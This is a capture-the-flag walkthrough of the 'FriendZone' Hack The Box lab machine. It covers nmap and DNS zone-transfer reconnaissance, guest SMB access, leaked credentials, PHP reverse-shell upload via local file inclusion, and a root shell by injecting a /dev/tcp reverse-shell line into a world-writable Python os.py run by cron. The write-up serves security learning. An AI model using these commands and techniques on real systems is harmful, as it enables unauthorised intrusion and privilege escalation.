Hi there, this is FriendZone machine walkthrough. An easy box but so much fun from this box.
- OS: Linux
- IP: 10.10.10.123
- Difficulty: Easy
Let's start with nmap xD.
$ nmap -sV -sC -A -Pn 10.10.10.123 Starting Nmap 7.30 ( https://nmap.org ) at 2019-06-06 23:14 KST Nmap scan report for 10.10.10.123 Host is up (0.30s latency). Not shown: 993 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA) |_ 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA) 53/tcp open domain | dns-nsid: |_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Friend Zone Escape software 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 443/tcp open ssl/http Apache httpd 2.4.29 |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: 400 Bad Request | ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO | Not valid before: 2018-10-05T21:02:30 |_Not valid after: 2018-11-04T21:02:30 |_ssl-date: ERROR: Script execution failed (use -d to debug) 445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP) Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: -0s, deviation: 0s, median: -0s |_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.7.6-Ubuntu) | Computer name: friendzone | NetBIOS computer name: FRIENDZONE\x00 | Domain name: \x00 | FQDN: friendzone |_ System time: 2019-06-06T17:14:52+03:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smbv2-enabled: Server supports SMBv2 protocol Post-scan script results: | clock-skew: |_ -0s: Majority of systems scanned Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 64.41 seconds
The most interested services to me were:
- FTP Server was running but username and password required.
- HTTP and HTTPS were running too xD
- This server was also used as DNS Server with doamin
- Samba file server was running and also allow for guest user xD
For http://10.10.10.123 I found this
But for https://10.10.10.123 was a Not Found page of Apache.
However there was a email on the page
email@example.com. From the result of NMAP scan and this email address, I thought the server had 2 domains,
friendzoneportal.red. So, I added these to my /etc/hosts file.
10.10.10.123 friendzone.red 10.10.10.123 friendzoneportal.red
Now open the webiste again using this domain. The HTTP pages showed the same result, but I tried HTTPS and found these.
Page source code didn't have any intesting hint. There were only that 2 GIF images.
I used dig command to check if any sub domains existed (because port 53 was opened) and yeahh, it existed xD
$ dig axfr friendzone.red @10.10.10.123 ; <<>> DiG 9.10.6 <<>> axfr friendzone.red @10.10.10.123 ;; global options: +cmd friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800 friendzone.red. 604800 IN AAAA ::1 friendzone.red. 604800 IN NS localhost. friendzone.red. 604800 IN A 127.0.0.1 administrator1.friendzone.red. 604800 IN A 127.0.0.1 hr.friendzone.red. 604800 IN A 127.0.0.1 uploads.friendzone.red. 604800 IN A 127.0.0.1 friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800 ;; Query time: 377 msec ;; SERVER: 10.10.10.123#53(10.10.10.123) ;; WHEN: Thu Jun 06 23:25:01 KST 2019 ;; XFR size: 8 records (messages 1, bytes 261)
$ dig axfr friendzoneportal.red @10.10.10.123 ; <<>> DiG 9.10.6 <<>> axfr friendzoneportal.red @10.10.10.123 ;; global options: +cmd friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800 friendzoneportal.red. 604800 IN AAAA ::1 friendzoneportal.red. 604800 IN NS localhost. friendzoneportal.red. 604800 IN A 127.0.0.1 admin.friendzoneportal.red. 604800 IN A 127.0.0.1 files.friendzoneportal.red. 604800 IN A 127.0.0.1 imports.friendzoneportal.red. 604800 IN A 127.0.0.1 vpn.friendzoneportal.red. 604800 IN A 127.0.0.1 friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800 ;; Query time: 511 msec ;; SERVER: 10.10.10.123#53(10.10.10.123) ;; WHEN: Thu Jun 06 23:25:25 KST 2019 ;; XFR size: 9 records (messages 1, bytes 281)
I added those domains in A record to my /etc/hosts file.
10.10.10.123 administrator1.friendzone.red 10.10.10.123 hr.friendzone.red 10.10.10.123 uploads.friendzone.red 10.10.10.123 admin.friendzoneportal.red 10.10.10.123 files.friendzoneportal.red 10.10.10.123 imports.friendzoneportal.red 10.10.10.123 vpn.friendzoneportal.red
There were 2 admin domains:
I tried do some SQL Injection but it didn't working and the page
admin.friendzoneportal.red showed a message that "Admin page is not developed yet !!! check for another one". So I thought only the first domain will work.
As the result from NMAP Scan that the SMB was running and allow guest user, so I tried to connect to that file server as guest user.
There were 3 volumes but after tried to mount, only 2 were able to mount.
Lol, I found some php shell files here. It was such a hint from other player xD. I checked for the folder permission and it was read/write access.
And in general volume I found a creds.txt file which was a credential for admin.
creds for the admin THING: admin:WORKWORKHhallelujah@#
I used this credential to login to
https://administrator1.friendzone.red and it showed a message like this.
Login Done ! visit /dashboard.php
So, now check
The beginner php developer of this page told us to add some params to the url to show the image. Haha, let's try...
I have looked around and nothing found. I only could change the image name a.jpg and b.jpg. But what is that param pagename???
As I found some php shell files inside shared folder Development, I thought that it must be a Local File Inclusion to the param pagename. So we have to know the real path of the shared volumne Development on the server.
I searched google for smb enum and I found smb-enum-shared script for NMAP. So, I started do nmap again.
$ nmap --script smb-enum-shares -p139 10.10.10.123 Starting Nmap 7.30 ( https://nmap.org ) at 2019-06-07 16:45 KST Nmap scan report for friendzone.red (10.10.10.123) Host is up (0.49s latency). PORT STATE SERVICE 139/tcp open netbios-ssn Host script results: | smb-enum-shares: | account_used: guest | Development: | Type: STYPE_DISKTREE | Comment: FriendZone Samba Server Files | Users: 3 | Max Users: <unlimited> | Path: C:\etc\Development | Anonymous access: READ/WRITE | Current user access: READ/WRITE | Files: | Type: STYPE_DISKTREE | Comment: FriendZone Samba Server Files /etc/Files | Users: 0 | Max Users: <unlimited> | Path: C:\etc\hole | Anonymous access: <none> | Current user access: <none> | IPC$: | Type: STYPE_IPC_HIDDEN | Comment: IPC Service (FriendZone server (Samba, Ubuntu)) | Users: 2 | Max Users: <unlimited> | Path: C:\tmp | Anonymous access: READ/WRITE | Current user access: READ/WRITE | general: | Type: STYPE_DISKTREE | Comment: FriendZone Samba Server Files | Users: 0 | Max Users: <unlimited> | Path: C:\etc\general | Anonymous access: READ/WRITE | Current user access: READ/WRITE | print$: | Type: STYPE_DISKTREE | Comment: Printer Drivers | Users: 0 | Max Users: <unlimited> | Path: C:\var\lib\samba\printers | Anonymous access: <none> |_ Current user access: <none> Nmap done: 1 IP address (1 host up) scanned in 92.14 seconds
I could see that Development shared volumne was stored on path /etc/Development.
Now I created a reverse shell file named a.php and copied to that shared volumne. I started running my netcat listener for that reverse shell and tried to execute reverse shell using filename param on admin website.
My a.php file should be at /etc/Development/a.php. By using Local File Inclusion technique, I opened it as
I didn't use extension .php because the sample of pagename=timestamp.
And my reverse shell listener
$ netcat -lvnp 1234 Connection from 10.10.10.123:54510 Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux 17:37:35 up 34 min, 0 users, load average: 2.85, 4.84, 5.16 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ ls /home friend $ cd /home/friend $ ls user.txt $ cat user.txt a9****************************11 $ python -c "import pty;pty.spawn('/bin/bash')" www-data@FriendZone:/home/friend$
In /var/www/ I found mysql_data.conf file which was the user and password of database.
www-data@FriendZone:/home/friend$ cd /var/www www-data@FriendZone:/var/www$ ls admin friendzoneportal html uploads friendzone friendzoneportaladmin mysql_data.conf www-data@FriendZone:/var/www$ cat mysql_data.conf for development process this is the mysql creds for user friend db_user=friend db_pass=Agpyu12!0.213$ db_name=FZ
So, I tried ssh to the machine using that password.
$ ssh firstname.lastname@example.org Chhaileng@Chhailengs-MacBook-Pro email@example.com's password: Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings You have mail. Last login: Fri Jun 7 10:34:26 2019 from 10.10.12.75 friend@FriendZone:~$
And I got the fully interactive TTY shell.
After got a shell on the box, I uploaded pspy64 to the box and excuted the binary. And this is what I noticed.
Script reporter.py was run by root. I kept tracking that process and saw that script was run by cron every a few minutes. This is what inside the reporter.py script. Most lines of code were commented, but there was a import os line which import library from python 2.7.
friend@FriendZone:/opt/server_admin$ cat reporter.py #!/usr/bin/python import os to_address = "firstname.lastname@example.org" from_address = "email@example.com" print "[+] Trying to send email to %s"%to_address #command = ''' mailsend -to firstname.lastname@example.org -from email@example.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"''' #os.system(command) # I need to edit the script later # Sam ~ python developer
I went to library directory which is /usr/lib/python2.7. The interested thing was that python2.7 directory was allowed with full permission.
friend@FriendZone:/usr/lib$ ls -la | grep python2 drwxrwxrwx 27 root root 16384 Jun 26 14:27 python2.7
Also the file os.py.
friend@FriendZone:/usr/lib/python2.7$ ls -la | grep os.py -rwxrwxrwx 1 root root 25876 Jun 26 14:32 os.py
Since the reporter.py was always run by root and call os python module, I injected some code to execute the reverse shell in os.py at the end.
system("bash -c 'bash -i &>/dev/tcp/10.10.12.78/1234 0<&1'")
I also ran the netcat listener for this reverse shell and wait for cronjob execute the script.
And I got a root shell.
$ nc -lvnp 1234 Connection from 10.10.10.123:54546 bash: cannot set terminal process group (3435): Inappropriate ioctl for device bash: no job control in this shell root@FriendZone:~# id uid=0(root) gid=0(root) groups=0(root) root@FriendZone:~# ls certs root.txt root@FriendZone:~# cat root.txt b0****************************c7 root@FriendZone:~#
Rooted, and I hope you enjoy this xD